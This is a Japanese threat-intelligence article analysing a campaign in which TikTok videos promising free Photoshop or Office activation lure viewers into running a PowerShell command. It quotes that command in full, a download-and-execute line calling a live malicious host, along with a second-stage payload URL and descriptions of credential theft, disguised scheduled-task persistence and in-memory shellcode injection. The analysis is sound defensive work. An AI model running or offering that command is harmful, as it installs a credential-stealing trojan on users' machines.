TikTok動画を悪用した新たな脅威
サイバー攻撃者がTikTokの広範なリーチを悪用し、一見無害な動画を通じてマルウェアを実行させる手口が確認されました。特に、無料のPhotoshopアクティベーションツールを提供するという偽の動画が拡散されており、視聴者に対し、管理者権限でPowerShellを開き、特定のコマンドを実行するよう促しています。
この手口では、powershell iex (irm slmgr.win/photoshop)というコマンドが使用されます。これは、Invoke-Expression (iex)を用いて、悪意のあるホストからInvoke-RestMethod (irm)で取得したスクリプトを実行するものです。この手法は、Microsoftのブログ上でユーザーを騙してコードを実行させる「ClickFix」ソーシャルエンジニアリングシナリオと類似しています。
マルウェアの多段階攻撃
被害者が提供されたリンクにアクセスすると、初期のPowerShellペイロード(SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23)がダウンロードされます。このペイロードは、VirusTotalでの検出率が17/63と低く、その新規性と回避能力を示しています。
初期スクリプトの実行後、マルウェアはhttps://file-epq.pages.dev/updater.exeから次のステージであるUpdater.exe(SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8)をダウンロードします。このバイナリは、ブラウザの保存済みパスワードや仮想通貨ウォレットを窃取することで知られるAuroStealerという認証情報窃取型トロイの木馬であることが判明しています。
巧妙な永続化とメモリ内実行
マルウェアは永続性を維持するため、PowerShellスクリプトが正規の更新タスク名(例:AdobeUpdateTask、WindowsUpdateCheck)のリストからランダムにタスク名を選択し、スケジュールされたタスクを作成します。これにより、Updater.exeはユーザーログオン時に疑われることなく、隠れたウィンドウでPowerShellを起動し、実行ポリシーをバイパスして実行されます。正規のタスク名を使用することで、悪意のある永続化がシステムの通常の動作に紛れ込み、検出を回避します。
AuroStealerのステージに続き、さらにsource.exe(SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)というペイロードが取得され、起動されます。このバイナリは、高度な自己コンパイル型マルウェア技術を採用しています。実行中に.NETコンパイラcsc.exeを呼び出し、一時的な.cmdlineファイルに保存されたソースコードをコンパイルします。コンパイルされたクラスには、VirtualAlloc、CreateThread、WaitForSingleObjectのP/Invoke宣言が含まれており、メモリの割り当て、プロセスへのシェルコードの直接注入、実行スレッドの生成、そして無期限の待機を可能にします。これにより、最終的なペイロードはディスクに触れることなく、完全にメモリ内で実行されます。このようなオンデマンドコンパイルは、最終的な悪意のあるコードが一時的なメモリ内にのみ存在するため、静的解析や検出を困難にします。
攻撃の拡大と対策
このキャンペーンでは、「Officeをアクティベート」や「Windowsをアンロック」といった異なるソフトウェアの誘い文句を使用したTikTok動画も確認されており、攻撃者がソーシャルエンジニアリングのテーマを繰り返し変更してリーチを広げていることが示唆されています。
- hxxps://vm.tiktok.com/ZGdaC7EQY/
- hxxps://vm.tiktok.com/ZGdaX8jVq/
このキャンペーンは、サイバー犯罪者がショートフォーム動画プラットフォームを悪用し、PowerShellを介して自己コンパイル型のメモリ内マルウェアを配信するという、進化する戦術を浮き彫りにしています。ユーザーは、未検証のソースから提供されたターミナルコマンドを絶対に実行すべきではありません。また、プラットフォーム側も、潜在的に危険な操作を促す指示がある場合に視聴者に警告することを検討すべきです。攻撃者が新たな配信チャネルと解析回避技術を組み合わせることで絶えず革新を続ける中、セキュリティ意識の向上と堅牢なエンドポイント防御が、これらの新たな脅威に対する最善の防御策となります。